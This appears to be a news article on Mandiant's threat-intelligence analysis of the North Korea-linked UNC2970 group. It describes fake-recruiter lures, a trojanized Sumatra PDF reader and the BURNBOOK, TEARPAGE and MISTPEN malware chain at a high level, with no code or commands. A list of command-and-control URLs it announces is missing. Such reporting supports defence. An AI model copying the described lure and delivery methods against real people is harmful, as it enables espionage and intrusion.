The activity cluster is being tracked by Google-owned Mandiant under the moniker **UNC2970**, which it said overlaps with a threat group known as TEMP.Hermit, which is also broadly called Lazarus Group or Diamond Sleet (formerly Zinc).

The threat actor has a history of targeting government, defense, telecommunications, and financial institutions worldwide since at least 2013 to collect strategic intelligence that furthers North Korean interests. It's affiliated with the Reconnaissance General Bureau (RGB).

The threat intelligence firm said it has observed UNC2970 singling out various entities located in the U.S., the U.K., the Netherlands, Cyprus, Sweden, Germany, Singapore, Hong Kong, and Australia.

"UNC2970 targets victims under the guise of job openings, masquerading as a recruiter for prominent companies," it said in a new analysis, adding it copies and modifies job descriptions according to their target profiles.

"Moreover, the chosen job descriptions target senior-/manager-level employees. This suggests the threat actor aims to gain access to sensitive and confidential information that is typically restricted to higher-level employees."

The attack chains, also known as Operation Dream Job, entail the use of spear-phishing lures to engage with victims over email and WhatsApp in an attempt to build trust, before sending across a malicious ZIP archive file that's dressed up as a job description.

In an interesting twist, the PDF file of the description can only be opened with a trojanized version of a legitimate PDF reader application called Sumatra PDF included within the archive to deliver MISTPEN by means of a launcher referred to as BURNBOOK.

It's worth noting that this does not imply a supply chain attack nor is there a vulnerability in the software. Rather the attack has been found to employ an older Sumatra PDF version that has been repurposed to activate the infection chain.

This is a tried-and-tested method adopted by the hacking group as far back as 2022, with both Mandiant and Microsoft highlighting the use of a wide range of open-source software, including PuTTY, KiTTY, TightVNC, Sumatra PDF Reader, and muPDF/Subliminal Recording software installer for these attacks.

It's believed that the threat actors likely instruct the victims to open the PDF file using the enclosed weaponized PDF viewer program to trigger the execution of a malicious DLL file, a C/C++ launcher called BURNBOOK.

"This file is a dropper for an embedded DLL, 'wtsapi32.dll,' which is tracked as TEARPAGE and used to execute the MISTPEN backdoor after the system is rebooted," Mandiant researchers said. "MISTPEN is a trojanized version of a legitimate Notepad++ plugin, binhex.dll, which contains a backdoor."

TEARPAGE, a loader embedded within BURNBOOK, is responsible for decrypting and launching MISTPEN. A lightweight implant written in C, MISTPEN is equipped to download and execute Portable Executable (PE) files retrieved from a command-and-control (C2) server. It communicates over HTTP with the following Microsoft Graph URLs.

Mandiant also said it uncovered older BURNBOOK and MISTPEN artifacts, suggesting that they are being iteratively improved to add more capabilities and allow them to fly under the radar. The early MISTPEN samples have also been discovered using compromised WordPress websites as C2 domains.

"The threat actor has improved their malware over time by implementing new features and adding a network connectivity check to hinder the analysis of the samples," the researchers said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#backdoor